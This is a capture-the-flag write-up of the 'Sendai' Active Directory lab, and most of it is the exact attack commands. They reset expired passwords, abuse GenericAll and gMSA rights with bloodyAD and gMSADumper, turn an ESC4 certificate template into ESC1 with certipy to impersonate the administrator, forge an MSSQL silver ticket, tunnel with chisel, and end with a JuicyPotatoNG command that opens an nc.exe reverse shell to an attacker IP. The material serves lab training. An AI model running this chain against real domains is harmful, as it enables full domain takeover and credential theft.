Sendai involved enumerating usernames through smb shares having password expired, resetting their password, belonging to Support
group they had GenericAll
on ADMSVC
group which had ReadGMSAPassword
on MGTSVC$
, enumerating the system to find clifford’s password which was part of ca-operators
group having full control over SendaiComputer
template making it vulnerable to ESC4
, then changing the configuration to make it vulnerable to ESC1
, escalating to domain admin.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-04T16:24:01
| Not valid after: 2024-11-03T16:24:01
| MD5: 6198fc32527e478294e38fd5c6a2b81e
|_SHA-1: 73b4d1026b49e0cb9c0d633982377e74f32b7db3
|_ssl-date: 2024-05-05T16:28:56+00:00; -1m22s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open unknown
56740/tcp open unknown
56744/tcp open unknown
PORT 80/443
Running gobuster, we can find /service
However this endpoints shows that we don’t have access to it
PORT 445
Enumerating smb shares with anonymous login, we’ll see config
, sendai
and Users
share, where config was not accessible, Users didn't anything but sendai had some interesting files
The incident talked about users having weak passwords, all users will be prompted to change their password on logging in, the transfer directory had user’s directories
Resetting domain user’s password
These users can also be enumerated through lookupsid
by brute forcing sids
On trying to login with null password, we’ll get two users with password to be changed
Password can be changed with impacket-smbpasswd
impacket-smbpasswd sendai.vl/Thomas.Powell@dc.sendai.vl -newpass '$aduwu123'
From config share, we can grab .sqlconfig
having credentials to MSSQL
But this service isn’t exposed to us so moving on to enumerating the domain with bloodhound
python3 bloodhound.py -u sqlsvc -p password -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.104.41
Thomas.Powell is a member of Support
group has GenericAll
on ADMSVC
group which has ReadGMSAPassword
on MGTSVC$
account. We'll need to add thomas in ADMSVC group, read the NThash of MGTSVC account
Abusing GenericAll and reading GMSA password
Through bloodyAD
we can add thomas in ADMSVC group having genericall rights
python3 bloodyAD.py --host "10.10.104.41" -d 'sendai.vl' -u 'thomas.powell' -p '$aduwu123' add groupMember ADMSVC thomas.powell
With gmsadumper script or with netexec we can dump the nthash of mgtsvc account
python3 gMSADumper.py -u 'thomas.powell' -p '$aduwu123' -d sendai.vl -l 10.10.104.41
This account can login on DC as it’s part of Remote Management
group
Checking the privileges after logging in through evil-winrm, it doesn’t have any privilege that we can abuse to get local admin
Obtaining clifford’s password
From the running process, we have helpdesk which doesn’t normally run on a system
Enumerating the system with PrivescCheck.ps1
This will list down the running processes from where we’ll find the clifford.davey’s creds
Enumerating ADCS
This user belongs to CA-Operators
group, so he likely will be able to enroll in a custom template, enumerating templates with certipy
Escalating privileges through ESC4
certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.115.126 -stdout
This lists down a template SendaiComputer
which has EKU set to Client Authentication
that can be used to authenticate on the system and ca-operators group has Full control over this template which means we can edit this template and impersonate as the domain admin, which is known as ESC4 (access control) abuse
With certipy, we can change the configuration of this template to allow domain users to enroll for this template and impersonate any user
certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.115.126 -template SendaiComputer
certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.115.126 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator
certipy auth -pfx ./administrator.pfx -domain sendai.vl
Escalating with SeImpersonate privilege
Another way of escalating privileges is through mssql, since mssql is running internally, having access on the machine we can port forward withchisel
chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socks
But we’ll get login denied for sqlsvc account
With ticketer,
forging a silver ticket for accessing MSSQL service as an administrator
ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash hash Administrator
Enabling xp_cmdshell
which will allow us to execute system commands as sqlsvc
The difference here is that we’ll have SeImpersonate
privilege, which can abuse to get local admin
Using juicypotato-ng
to abuse the privilege and get a shell a SYSTEM
.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Users\sqlsvc\nc.exe 10.8.0.136 4444 -e cmd.exe"